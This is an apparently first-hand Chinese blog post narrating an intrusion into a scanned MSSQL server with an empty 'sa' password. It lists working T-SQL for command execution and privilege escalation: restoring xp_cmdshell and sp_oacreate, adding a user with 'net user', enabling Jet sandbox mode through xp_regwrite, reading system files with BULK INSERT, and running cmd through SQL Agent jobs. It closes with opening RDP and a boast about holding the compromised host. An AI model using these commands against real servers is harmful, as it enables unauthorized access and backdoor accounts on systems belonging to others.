记一次艰难的sql提权。
昨晚没关机 扫了一夜 扫到一个3389,而且开着1433,且1433的sa账户是空口令。
遂大喜。
第一步:尝试xp_cmdshell
提示找不到xplog70.dll,于是我恢复一下xp_cmdshell试试
dbcc addextendedproc ( ' xp_cmdshell ' , ' xplog70.dll ' )
仍然提示找不到xplog70.dll,看来是管理员把该DLL删除了。
第二步:尝试xp_oacreate
exec sp_oacreate ' wscript.shell ' , @shell output
exec sp_oamethod @shell , ' run ' , null , ' c:\windows\system32\cmd.exe /c net user lee asdf123 /add ' --
结果提示无法找到odsole70.dll,于是恢复sp_oacreate试试
dbcc addextendedproc ( ' sp_oacreate ' , ' odsole70.dll ' )
仍然提示找不到odsole70.dll,无奈,管理员将这个dll也删除了。
第三步:尝试xp_regwrite (使用xp_regwrite修改注册表,开启沙盒模式)
exec xp_regwrite ' HKEY_LOCAL_MACHINE ' , ' SoftWare\Microsoft\Jet\4.0\Engine ' , ' SandBoxMode ' , ' REG_DWORD ' , 1
成功执行了 噢YEAH。
然后通过openrowset引用microsoft.jet引擎,执行dos命令,c:\windows\system32\ias\ias.mdb这个数据库文件是xp/2003默认带的,可以通过dir /a /s *.mdb 查看当前系统的mdb文件。
提示下面这个错误,不知道为什么,但是可以证明的是microsoft.jet.oledb.4.0是可用的,否则会提示找不到microsoft.jet.oledb.4.0。
初步分析是ias.mdb被管理员删除。
OLE DB 错误跟踪[OLE / DB Provider ' microsoft.jet.oledb.4.0 ' IDBInitialize::Initialize returned 0x80004005 : ]。
Msg 7399 , Level 16 , State 1 , Line 1
OLE DB 提供程序 ' microsoft.jet.oledb.4.0 ' 报错。
为了证实ias.mdb被管理员删除,于是通过BULK执行该命令查看ias.mdb是否存在。
CREATE TABLE [ clee ] (ResultTxt nvarchar ( 1024 ) NULL )
BULK INSERT [ clee ] FROM ' c:\windows\system32\ias\ias.mdb ' WITH (KEEPNULLS)
insert into [ clee ] values ( ' g_over ' );
Alter Table [ clee ] add id int NOT NULL IDENTITY ( 1 , 1 )
select * from [ clee ]
返回如下提示,证实了我的想法,ias.mdb果然被变态的管理员删除了,真搞不懂安全设置可以考虑这么周到的管理员竟然会给sa留下一个空口令。
未能进行大容量插入。文件 ' c:\windows\system32\ias\ias.mdb ' 不存在。
不过,得到该提示说明BULK是可以使用的,我们是可以读取磁盘的文件的。
于是我看了下boot.ini文件
CREATE TABLE [ clee ] (ResultTxt nvarchar ( 1024 ) NULL )
BULK INSERT [ clee ] FROM ' c:\boot.ini ' WITH (KEEPNULLS)
insert into [ clee ] values ( ' g_over ' );
Alter Table [ clee ] add id int NOT NULL IDENTITY ( 1 , 1 )
select * from [ clee ]
得到如下结果
说明是2003企业版的。
第四步 启动SQLSERVERAGENT 通过JOB执行cmd
抱着试一试的心态,我启动SqlserverAgent
竟然提示服务启动成功,这下终于可以执行dos命令了。
接着添加执行cmd命令的JOB。
exec sp_delete_job NULL , ' x '
exec sp_add_job ' x '
exec sp_add_jobstep NULL , ' x ' , NULL , 1 , ' CMDEXEC ' , ' cmd /c dir c:\ > c:\a.txt '
exec sp_add_jobserver NULL , ' x ' , @@servername
exec sp_start_job ' x '
这里执行dir列目录命令,列出c盘根目录下的文件,将结果保存到a.txt
然后通过BULK查看a.txt中的结果。
CREATE TABLE [ clee ] (ResultTxt nvarchar ( 1024 ) NULL )
BULK INSERT [ clee ] FROM ' c:\a.txt ' WITH (KEEPNULLS)
insert into [ clee ] values ( ' g_over ' );
Alter Table [ clee ] add id int NOT NULL IDENTITY ( 1 , 1 )
select * from [ clee ]
OK 顺利看到结果,接下来运行net user,加上账户后,使用xp_regwrite通过更改注册表打开3389,然后连上可爱的3389吧。
=======================================================
======================= 华丽的分割线 =======================
=======================================================
后记:
这次入侵成功的关键点第一个是管理员将sa设置为空口令,而且sqlserveragent可以启动,这样就可以通过job来执行cmd命令并结合bulk查看执行结果了。
连上3389后我才知道,xplog70.dll和odsole70.dll 还有ias目录下两个可爱的mdb文件,不是管理员删除的,是另外一个同行拿到3389后,为了不让该肉鸡沦落到他人手中而删掉的,fuck! 我从来不干这种事,一向都是有鸡同享 -。-